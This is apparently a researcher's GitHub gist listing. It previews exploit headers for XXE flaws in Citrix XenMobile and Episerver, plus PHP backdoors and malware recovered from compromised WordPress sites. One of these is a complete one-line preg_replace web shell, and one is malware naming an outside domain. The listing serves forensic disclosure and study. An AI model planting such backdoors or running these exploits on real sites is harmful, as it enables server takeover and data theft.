jonaslejon’s gists

jonaslejon / custom.list.chroot

Last active February 21, 2023 14:13

My custom Kali Linux package list for building the live ISO

jonaslejon / xenxxe.py

Last active September 9, 2021 06:07

Citrix XenMobile XXE Exploit

	#!/usr/bin/python3
	##
	## PoC test for the XXE security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3
	##
	## This PoC was written by Jonas Lejon 2019-11-28 <jonas.xenmobile@triop.se> https://triop.se
	## Reported to Citrix 2017-10, patch released 2018-05
	##

	import requests
	import sys

jonaslejon / gist:229e96e45bcb527cdf63b8ee930687af

Last active February 17, 2020 08:21

RSA PGP key for info@wpsec.com

	-----BEGIN PGP PUBLIC KEY BLOCK-----

	mQINBF5KTFIBEADRvxOAHWw/4xG1BBZvJiA8FXIC/2nu65CMVwyvWVgWkPskRi5A
	WcVvBDXUOkIzCliTi8Fq9qEgg9/VT7QjBBVlVXNGHI1Ps4VSQHjHFAjRjl8cfT6k
	j4NaOzDQk3G8k0y1+nAI5etDEMdDjCV1A2DQd6w8i15MJnKe2tax7DdGa6jh262s
	gByhyBmPlA3mww0qFSl3Fq6hQJPR+S9sLldT87IU/VNx7dbhj3gW+/DTS7CECwoU
	3D3VGllo5xnY8upGnKqpJtyF82LElaWhANpOveCQu+fDrD/NiO47aOZd9XMqQaM9
	Zavxs9mVWj7GZKFwfXM4EfXz4/MPH90/txODL/t8CDuH+YG3rFec9VyFjpunQHbE
	5pvGiIdBhasEc6dbtpEbu2gsNpB1CsOCt85Nijyswlga74gI/RP7m+1xrnhytvxG
	cAqFpBt3woJprlX5W8CgxnVt4c5I7pf18+k31/UyBP1v4rkp06YUD/No5Np7BN4+

jonaslejon / dns-resolvers.txt

Last active June 25, 2018 19:52

DNS Resolvers with tcpdump output

jonaslejon / episploit.py

Last active October 5, 2020 01:00

Episerver XXE Vulnerability - Exploit Episploit

	#!/usr/bin/python
	##
	## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
	##
	## Starts a listening webserver, so the exploits needs a public IP and unfiltered port, configure RHOST below!
	##
	## Written by Jonas Lejon 2017-12-19 <jonas.xxe@triop.se> https://triop.se
	## Based on https://gist.github.com/mgeeky/7f45c82e8d3097cbbbb250e37bc68573
	##
	## Usage: ./episploit.py <target> [file-to-read]

jonaslejon / wp-uninstall.php

Created April 8, 2018 19:16

WordPress backdoor found in file wp-uninstall.php

	error_reporting(0);
	if (!isset($_SESSION['bajak'])) {
	$visitcount = 0;
	$web = $_SERVER["HTTP_HOST"];
	$inj = $_SERVER["REQUEST_URI"];
	$body = "ada yang inject \n$web$inj";
	$safem0de = @ini_get('safe_mode');
	if (!$safem0de) {$security= "SAFE_MODE = OFF";}
	else {$security= "SAFE_MODE = ON";};
	$serper=gethostbyname($_SERVER['SERVER_ADDR']);

jonaslejon / _input__test.php.

Created October 10, 2017 18:58

WordPress backdoor found during forensic investigation of blog. Was located in folder wp-content/uploads/

	<?php
	/**
	* @package Joomla.Plugin.System
	* @since 1.5
	*
	*
	*/
	class PluginJoomla {
	public function __construct() {
	$jq = @$_COOKIE['ContentJQ3'];

jonaslejon / wp-blog-header.php

Last active July 7, 2018 14:38

Malware found on WordPress installation. This is the deobfuscated version

	<?php @error_reporting(0);
	define('cdomainDosNZ', "ssl-backup24.com");
	define('showop_phpDosNZ', "showop_click.php");
	define('info_phpDosNZ', 'info.php');
	if (array_key_exists('HTTP_TEST', $_SERVER)) {
	echo (md5("TEST2016_CLICK"));
	exit;
	}
	function fetch_urlDosNZ($url, $data) {
	$content = '';

jonaslejon / file-upload.php

Created February 10, 2016 20:19

PHP file upload backdoor

	<?php
	$self = $_SERVER['PHP_SELF'];
	$docr = $_SERVER['DOCUMENT_ROOT'];
	$sern = $_SERVER['SERVER_NAME'];
	$tend = "</tr></form></table><br><br><br><br>";
	if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
	elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
	else {$ac = "upload";}
	switch($ac) {
	case "upload":

jonaslejon / php-preg-replace-backdoor.php

Created February 10, 2016 20:11

Short PHP backdoor using preg_replace. Found during forensic investigation

<?php @preg_replace('/(.*)/e', @$_POST['cgrycynqatjstuh'], '');

Jonas Lejon jonaslejon